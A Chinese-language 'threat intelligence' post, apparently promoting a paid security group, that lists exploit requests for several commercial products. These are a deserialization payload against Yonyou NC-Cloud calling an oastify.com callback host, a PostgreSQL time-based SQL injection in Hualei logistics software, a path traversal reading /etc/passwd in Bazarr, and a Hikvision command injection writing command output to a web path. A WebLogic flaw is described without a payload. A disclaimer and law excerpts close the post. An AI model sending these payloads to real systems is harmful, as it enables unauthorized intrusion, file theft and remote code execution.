“ 威胁情报”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
威胁情报③
1.用友NC-Cloud blobRefClassSearch接囗存在反序列化漏洞
POST /ncchr/pm/ref/indiIssued/blobRefclassSearch HTTP/1.1Host:x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86 64) AppleWebKit/537.36 (KHTML, like Gecko) chrome/41.0.2227.0 Safari/537.36Content-Type: application/jsonContent-Length:146{"clientParam":"{\"x\":{\"@typel":\"java.net.InetSocketAddress"{\"address\":,\"val\":"111111.j3nmzhym834g0t5n9dv5kupkrbx2ls9h.oastify.com "}}}"}
2.华磊科技物流-modifyInsurance-delay-pg-sql注入漏洞
GET /modifyInsurance.htm?documentCode=-1&insuranceValue=-1&customerId=-1+and+1=(select+1+from+pg_ sleep(6)) HTTP/1.1Host:User-Agent:Mozila/5.0 (Macintosh; Intel Mac Os X 10.15; rv:122.0)Gecko/20100101 Firefox/122.0
3.Bazarr swaggerui 组件 目录穿越导致任意文件读取漏洞
http://IP/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd4.Oracle WebLogic Server远程代码执行漏洞
该漏洞利用方式较为简单,攻击者在未授权条件下,利用 IIOP协议反序列化,实现远程代码执行,获取服务器权限(无需出网)影响范围包括:Weblogic 12.2.1.4.0Weblogic 14.1.1.0
5.海康威视综合安防管理平台detection存在前台远程命令执行
POST /center/api/installation/detection HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/json;charset=UTF-8{"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}http://ip/vms/static/1.txt
更多精彩内容请扫码关注“重生者安全”星球
免责声明:
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助
第十二条: 国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
第十三条: 国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。
